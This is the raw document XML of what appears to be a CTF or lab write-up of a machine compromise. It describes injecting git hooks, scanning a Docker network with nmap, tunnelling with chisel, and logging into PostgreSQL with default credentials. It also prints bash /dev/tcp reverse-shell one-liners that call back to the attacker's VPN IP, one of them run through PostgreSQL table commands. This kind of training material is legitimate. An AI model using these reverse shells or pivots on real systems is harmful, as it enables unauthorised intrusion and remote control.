        <w:t xml:space="preserve">pre-receive</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update</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post-receive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — with our reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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6">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7">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/bin/bash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/dev/tcp/&lt;ip-vpn&gt;/443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0&gt;&amp;1"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="149"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2311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68700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="150"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943600" cy="3568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execute the code, it was necessary to perform another </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git push</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, triggering the modified hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="151"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2260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opened port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and successfully obtained the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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68400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152"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43600" cy="1168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5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rrdcxw84uh5o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation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user flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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7">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While analyzing files in the root directory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identified a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.dockerenv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating that the environment was running inside a Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">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943600" cy="2895600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="154"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943600" cy="2895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C">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D">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this was a standard Docker container, no relevant files or information were identified for direct privilege escalation. To attempt privilege escalation, we enumerated the infrastructure to identify which hosts were accessible within the local network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">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scan the local network, we used a static </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nmap</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binary. We hosted the binary on our machine and transferred it to the target environment using a local server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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&lt;vpn-ip&gt;/nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>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1879600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="155" name="image58.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image58.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1879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python3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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="156"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943600" cy="240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Com o comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname -i,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> identificamos o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP atribuído à máquina</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e, em seguida, realizamos o scan da rede utilizando a opção </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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 command hostname </w:t>
      </w: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address assigned to the machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then scanned the network using the -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option of Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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B">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172.17.0.2/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="135"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943600" cy="2260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Two active hosts were identified on the network: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.3</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172.17.0.1</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A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executed Nmap against host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and identified that ports </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80</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22</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">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2">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172.17.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="136"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943600" cy="209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scanning host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified that port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432 (PostgreSQL)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="137"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43600" cy="2298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verified whether the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service was accessible using the default credentials </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres:postgres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AA">
      <w:pPr>
        <w:jc w:val="both"/>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Port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forwarding</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allows redirecting traffic from one port on a system to another port on a different host, making internal services externally accessible.</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In this way, we managed to access the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service that was only exposed on the internal network.</w:t>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port was accessible only internally, it was necessary to create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunnel using  </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Chisel</w:t>
        </w:r>
      </w:hyperlink>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A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transferred the Chisel binary to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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F">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&lt;machine-ip&gt;/chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="138"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943600" cy="2032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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="139"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943600" cy="1028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established the port forwarding connection on the target machine. T</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he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traffic</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from a remote port to a local port, enabling access to the identified internal service.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">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7">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&lt;vpn-ip&gt;:9000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R:5432:172.17.0.3:5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="140"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943600" cy="82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B">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C">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./chisel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9000 --reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="141"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943600" cy="1130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allowed access to the internal </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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2">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localhost</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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00200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="142"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5943600" cy="1600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6">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If the user has elevated privileges such as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user, it is possible to execute commands directly through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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create table shell(output text);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">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A">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'/bin/bash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/dev/tcp/&lt;vpn-ip&gt;/443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0&gt;&amp;1"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B">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33400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="143"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43600" cy="53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this point forward, we escalated to the </w:t>
      </w:r>
